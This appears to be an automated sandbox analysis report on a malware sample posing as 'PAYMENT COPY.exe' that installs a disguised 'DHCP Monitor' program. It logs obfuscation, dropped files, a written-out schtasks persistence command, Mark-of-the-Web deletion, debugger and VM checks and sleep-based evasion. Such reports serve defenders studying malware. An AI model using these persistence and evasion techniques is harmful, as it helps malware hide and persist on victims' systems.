    Source: 8.2.PAYMENT COPY.exe.49c0000.10.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
    Source: 8.2.PAYMENT COPY.exe.49c0000.10.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
    Source: 15.2.dhcpmon.exe.4e30000.10.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
    Source: 15.2.dhcpmon.exe.4e30000.10.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeFile created: C:\Users\user\AppData\Local\Temp\nsoF70E.tmp\System.dllJump to dropped file
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeFile created: C:\Users\user\AppData\Local\Temp\ri8clfcgml62un.dllJump to dropped file
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeFile created: C:\Users\user\AppData\Local\Temp\nsc2504.tmp\System.dllJump to dropped file
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeFile created: C:\Users\user\AppData\Local\Temp\nsmD8C8.tmp\System.dllJump to dropped file
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJump to dropped file

    Boot Survival:

    barindex
    Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
    Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpEEDF.tmp'

    Hooking and other Techniques for Hiding and Protection:

    barindex
    Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeFile opened: C:\Users\user\Desktop\PAYMENT COPY.exe:Zone.Identifier read attributes | deleteJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeWindow / User API: threadDelayed 5356Jump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeWindow / User API: threadDelayed 4142Jump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeWindow / User API: foregroundWindowGot 456Jump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeWindow / User API: foregroundWindowGot 420Jump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeWindow / User API: foregroundWindowGot 374Jump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exe TID: 6660Thread sleep time: -13835058055282155s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exe TID: 7108Thread sleep count: 42 > 30Jump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exe TID: 7048Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6404Thread sleep count: 42 > 30Jump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 4496Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405A15
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_004065C1 FindFirstFileA,FindClose,0_2_004065C1
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00404A29 FindFirstFileExW,1_2_00404A29
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_1_00404A29 FindFirstFileExW,1_1_00404A29
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 8_2_00404A29 FindFirstFileExW,8_2_00404A29
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 10_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,10_2_00405A15
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 10_2_004065C1 FindFirstFileA,FindClose,10_2_004065C1
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 10_2_004027A1 FindFirstFileA,10_2_004027A1
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 15_2_00404A29 FindFirstFileExW,15_2_00404A29
    Source: PAYMENT COPY.exe, 00000001.00000003.303652307.0000000000634000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0040446F
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_73581A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_73581A98
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_72C347A3 mov eax, dword ptr fs:[00000030h]0_2_72C347A3
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_72C345A0 mov eax, dword ptr fs:[00000030h]0_2_72C345A0
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_004035F1 mov eax, dword ptr fs:[00000030h]1_2_004035F1
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_1_004035F1 mov eax, dword ptr fs:[00000030h]1_1_004035F1
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 7_2_72C347A3 mov eax, dword ptr fs:[00000030h]7_2_72C347A3
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 7_2_72C345A0 mov eax, dword ptr fs:[00000030h]7_2_72C345A0
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 8_2_004035F1 mov eax, dword ptr fs:[00000030h]8_2_004035F1
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 15_2_004035F1 mov eax, dword ptr fs:[00000030h]15_2_004035F1
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_004067FE GetProcessHeap,1_2_004067FE
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00401E1D SetUnhandledExceptionFilter,1_2_00401E1D
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0040446F
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00401C88
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00401F30
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_1_00401E1D SetUnhandledExceptionFilter,1_1_00401E1D
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_1_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_1_0040446F
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_1_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_1_00401C88
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_1_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_1_00401F30
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 8_2_00401E1D SetUnhandledExceptionFilter,8_2_00401E1D
